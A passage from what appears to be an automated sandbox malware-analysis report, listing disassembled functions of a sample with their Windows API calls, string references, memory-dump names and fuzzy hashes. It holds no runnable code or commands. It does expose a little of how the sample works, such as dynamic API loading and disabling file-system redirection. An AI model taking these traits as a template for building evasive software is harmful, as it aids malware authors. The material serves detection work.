SendMessageW.USER32 ref: 00007FF7A520EBBD
SendMessageW.USER32 ref: 00007FF7A520EC17

Strings

@, xrefs: 00007FF7A520EC32

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
Instruction ID: 31f108b7ee177fb3a4d8172ad4c9a3eacd11c16f0eaa2fa4da7b0e36244cdf25
Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
Instruction Fuzzy Hash: 5A51D3B361A68192E720EF52E8805AEF760F7C9B94F860031EE4D53B99DE7CD545CB10

Function 00007FF7A521A6BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00007FF7A521A74D
DeleteMenu.USER32 ref: 00007FF7A521A799
DeleteMenu.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7A521A7E6

Strings

P, xrefs: 00007FF7A521A722

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: P
API String ID: 135850232-3110715001
Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
Instruction ID: fce4ee6c96a309aaf4d201535d573113a02e8d5879835560e201f9f79f6248ff
Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
Instruction Fuzzy Hash: 4041E472A05A8185EB11EB15CC043AEA761FB86FA0F978231DA2D077E9CF3DD542C760

Function 00007FF7A51DEAA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000010,00000010,00000000,00000010,00007FF7A51DEF05), ref: 00007FF7A51DEB8E
WriteFile.KERNEL32 ref: 00007FF7A51DEBC1
GetLastError.KERNEL32 ref: 00007FF7A51DEBE3

Strings

U, xrefs: 00007FF7A51DEB6C

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
Instruction ID: b04068b658aa00fa4ba710af4ad2e4f8161fcb47b9a47c3256fda3e8dd77cb19
Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
Instruction Fuzzy Hash: E041D423B1A64182DB219F15F8447BAB7A0FB89B95F814131EE4E877A8DF3CE405C750

Function 00007FF7A524B454 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

SetWindowPos.USER32 ref: 00007FF7A524B556
GetWindowLongW.USER32 ref: 00007FF7A524B57B
SetWindowLongPtrW.USER32 ref: 00007FF7A524B58E

Strings

SysTreeView32, xrefs: 00007FF7A524B512

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
Instruction ID: 5459d680ad4e119cebcc15457f0a8838428c846353836dc5e0917fb9003681b3
Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
Instruction Fuzzy Hash: B9414E7260A7D186E7709B28E844B9AB7A1F785B60F554335DAA803BE8CF3CD845CF50

Function 00007FF7A524AB9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

SendMessageW.USER32 ref: 00007FF7A524AC80
SetWindowPos.USER32 ref: 00007FF7A524ACA9
SendMessageW.USER32 ref: 00007FF7A524ACE0

Strings

SysMonthCal32, xrefs: 00007FF7A524ABE3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$Window$CreateObjectStock
String ID: SysMonthCal32
API String ID: 2671490118-1439706946
Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
Instruction ID: c0d95f51c8926e6415e0b0a8d1c4984e78041f547b676c238f5ce90f1a771473
Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
Instruction Fuzzy Hash: DB417C726096C2CBE370DF15E444B9AB7A1FB89B90F514235EA9903AA8DF3DD4858F40

Function 00007FF7A524B798 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

SendMessageW.USER32 ref: 00007FF7A524B8B1
SendMessageW.USER32 ref: 00007FF7A524B8C9
DestroyWindow.USER32 ref: 00007FF7A524B8D6

Strings

msctls_updown32, xrefs: 00007FF7A524B7E3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyObjectStock
String ID: msctls_updown32
API String ID: 1752125012-2298589950
Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
Instruction ID: f3e27f233474dcb109b31d3575fd0b73058934a2edd4217014f507326c6b566f
Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
Instruction Fuzzy Hash: E131A376A1AB8586EB20DF15E8403AAB360FBC6F91F518135DA8D03BA8CF3CD444CB10

Function 00007FF7A524A1F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

SendMessageW.USER32 ref: 00007FF7A524A2E4
SendMessageW.USER32 ref: 00007FF7A524A2F8
MoveWindow.USER32 ref: 00007FF7A524A328

Strings

Listbox, xrefs: 00007FF7A524A23D

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$Window$CreateMoveObjectStock
String ID: Listbox
API String ID: 3747482310-2633736733
Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
Instruction ID: 9c6188cd91a477542576aa9c0ed4511a846f4772e2021f79c68f75a9e0f038e6
Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
Instruction Fuzzy Hash: 29317C726197C186E730DF16F844A5AB7A1F789BA0F504235EAA903BA8DB3DD481CF00

Function 00007FF7A5224DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00007FF7A5224E29
GetVolumeInformationW.KERNEL32 ref: 00007FF7A5224E9F
SetErrorMode.KERNEL32 ref: 00007FF7A5224F0E

Strings

%lu, xrefs: 00007FF7A5224EB0

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
Instruction ID: c9181e86e126db1e43ab49df710278a882818ad8b58e0fc1c18a6916784bfb28
Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
Instruction Fuzzy Hash: 08316E72609B8695DB11EB16E84017DB7A1FB8AF80F824031EB8D43BA9CF7CD595C710

Function 00007FF7A524B104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

SendMessageW.USER32 ref: 00007FF7A524B1BE
SendMessageW.USER32 ref: 00007FF7A524B1DA
SendMessageW.USER32 ref: 00007FF7A524B1EF

Strings

msctls_trackbar32, xrefs: 00007FF7A524B14B

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: msctls_trackbar32
API String ID: 1025951953-1010561917
Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
Instruction ID: 9de5a96f77d7418894e4a20f5941899decbebb93e955b566a1306938d77d1647
Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
Instruction Fuzzy Hash: 1F314872A19681C7E760DF15E844B5AB7A1FB89B90F514239EB9803BA8CF3CD841CF14

Function 00007FF7A520F5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A520F378: SendMessageTimeoutW.USER32 ref: 00007FF7A520F3A8
Part of subcall function 00007FF7A520F378: GetWindowThreadProcessId.USER32 ref: 00007FF7A520F3B8
Part of subcall function 00007FF7A520F378: GetCurrentThreadId.KERNEL32 ref: 00007FF7A520F3C0
Part of subcall function 00007FF7A520F378: AttachThreadInput.USER32 ref: 00007FF7A520F3E5

GetFocus.USER32 ref: 00007FF7A520F605

Part of subcall function 00007FF7A520F3F4: GetParent.USER32 ref: 00007FF7A520F407

GetClassNameW.USER32 ref: 00007FF7A520F656
EnumChildWindows.USER32 ref: 00007FF7A520F684

Part of subcall function 00007FF7A520F378: GetWindowThreadProcessId.USER32 ref: 00007FF7A520F3D0
Part of subcall function 00007FF7A520F378: GetCurrentThreadId.KERNEL32 ref: 00007FF7A520F3D8

Strings

%s%d, xrefs: 00007FF7A520F691

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
String ID: %s%d
API String ID: 2330185562-1110647743
Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
Instruction ID: d77aebd107833d3d795f05ac86c17712639bb4988d032f032973af00ba8b114c
Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
Instruction Fuzzy Hash: E62141B170AB8291EA24EB21E8442FAA361EB46FC0F954031DE9D077BDDE2CE545C760

Function 00007FF7A51C8782 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51C7130: __vcrt_getptd_noexit.LIBVCRUNTIME ref: 00007FF7A51C7134

__DestructExceptionObject.LIBVCRUNTIME ref: 00007FF7A51C87AA
RaiseException.KERNEL32 ref: 00007FF7A51C87D3
__DestructExceptionObject.LIBVCRUNTIME ref: 00007FF7A51C8834

Strings

csm, xrefs: 00007FF7A51C8807

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
String ID: csm
API String ID: 2280078643-1018135373
Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
Instruction ID: 96e4c7e06f841ef0269fcb3ca8b6dfe692670bed929f0e6eaa2138520db869f8
Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
Instruction Fuzzy Hash: FD21413660964196D671EF15F44017EB7A0F786FA0F810225DE8D03BA9CF3EE886CB10

Function 00007FF7A521C110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF7A521C14F
DeviceIoControl.KERNEL32 ref: 00007FF7A521C1CB
CloseHandle.KERNEL32 ref: 00007FF7A521C1D6

Strings

0, xrefs: 00007FF7A521C1AC

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: 0
API String ID: 33631002-4108050209
Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
Instruction ID: 47c99a7b2717822666571fa08258a3c13fc33cd20409c572a00d875aea2e7d3d
Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
Instruction Fuzzy Hash: C721A376618B80C6D3208F21E88469AB7B4F385B94F554226EB9D03B98CF3DC659CB00

Function 00007FF7A523AF20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A5202DD1), ref: 00007FF7A523AF37
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A5202DD1), ref: 00007FF7A523AF4F

Strings

kernel32.dll, xrefs: 00007FF7A523AF30
GetSystemWow64DirectoryW, xrefs: 00007FF7A523AF45

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
Instruction ID: 8e3d5012978e568653231bb6609b75a3452a69b8e9de93cff33ae00983eda6eb
Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
Instruction Fuzzy Hash: 16F0F8A1A16B0191EF19EB60E844374A3A4EB19F19FC50435C91D063B8EF7DE558C360

Function 00007FF7A51A6D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00007FF7A51A6490), ref: 00007FF7A51A6D7B
GetProcAddress.KERNEL32(?,?,?,00007FF7A51A6490), ref: 00007FF7A51A6D93

Strings

kernel32.dll, xrefs: 00007FF7A51A6D74
Wow64DisableWow64FsRedirection, xrefs: 00007FF7A51A6D89

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
Instruction ID: 6a5b9587b1979b75d68ea57896cea61a1580931ac6a320d23e138a6415f07710
Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
Instruction Fuzzy Hash: 7DE06DA6A07F0681EF1AAB10E80437463E0FB19F48FC50430CA0D423A8EF7CE694C310

Function 00007FF7A52410C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00007FF7A523FCA6), ref: 00007FF7A52410DF
GetProcAddress.KERNEL32(?,?,?,00007FF7A523FCA6), ref: 00007FF7A52410F7

Strings

RegDeleteKeyExW, xrefs: 00007FF7A52410ED
advapi32.dll, xrefs: 00007FF7A52410D8

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
Instruction ID: 28ce2a8c5f7079a90db3d82b1d7b73a1549804cb0c604350e019387fe48cfbd1
Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
Instruction Fuzzy Hash: 7FE0EDA1A07B0691FF18EB20E85436863A0EB19F55F860435C91D453A8EF7DD595C760

Function 00007FF7A5237634 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00007FF7A5237124), ref: 00007FF7A523764B
GetProcAddress.KERNEL32(?,?,?,00007FF7A5237124), ref: 00007FF7A5237663

Strings

GetModuleHandleExW, xrefs: 00007FF7A5237659
kernel32.dll, xrefs: 00007FF7A5237644

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
Instruction ID: 451cd3d16337383aca2cb28230fbe093d784a083b8c03ac05eacb89472798506
